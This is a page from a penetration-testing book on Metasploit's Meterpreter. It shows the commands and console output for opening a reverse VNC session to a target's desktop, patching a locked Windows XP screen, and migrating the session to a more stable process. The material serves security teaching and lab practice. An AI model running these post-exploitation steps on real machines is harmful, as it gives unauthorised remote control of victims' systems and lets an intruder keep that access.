background image

92

Chapter 6

Using Meterpreter Scripts

Several external Meterpreter scripts can help you to enumerate a system or 
perform predefined tasks inside the Meterpreter shell. We won’t cover every 
script here, but we will mention a few of the most notable ones.

NOTE

The Meterpreter scripts are in the process of being moved to post exploitation modules. 
We’ll cover both scripts and post exploitation modules in this chapter.

To run a script from the Meterpreter console, enter 

run 

scriptname

. The 

script will either execute or provide additional help on how to run it.

Should you want to use an interactive remote GUI on the system, you 

can use the VNC protocol to tunnel the active desktop communications 
and interact with the GUI desktop on the target machine. But in some 
cases, the system may be locked and you may be unable to access it. Never 
fear: Metasploit has us covered.

In the following example, we issue the 

run vnc

 command, which installs a 

VNC session on the remote system. From there, we launch 

run screen_unlock

 

to unlock the target machine so that we can view the desktop. As a result, a 
VNC window should appear, showing us the target desktop.

meterpreter > 

run vnc

[*] Creating a VNC reverse tcp stager: LHOST=192.168.33.129 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 37888 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\CTDWtQC.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.33.129:4545...
[*] VNC Server session 2 opened (192.168.33.129:4545 -> 192.168.33.130:1091)

This will give us a VNC graphical interface to the target machine and 

allow us to interact through a desktop. 

meterpreter > 

run screen_unlock

[*] OS 'Windows XP (Build 2600, Service Pack 2).' found in known targets
[*] patching...
[*] done!

Migrating a Process

Often, when we are attacking a system and exploiting a service such as Inter-
net Explorer, if the target user closes the browser, the Meterpreter session 
is also closed and we lose our connection to the target. To avoid this prob-
lem, we can use the 

migrate

 post exploitation module, shown next, to attempt 

to migrate the service to a memory space that won’t close when the target 
closes the browser. By migrating to a different, more stable process, we ensure 
that the process isn’t closed and we maintain our connection to the system.

meterpreter > 

run post/windows/manage/migrate

[*] Running module against V-MAC-XP
[*] Current server process: revterp.exe (2436)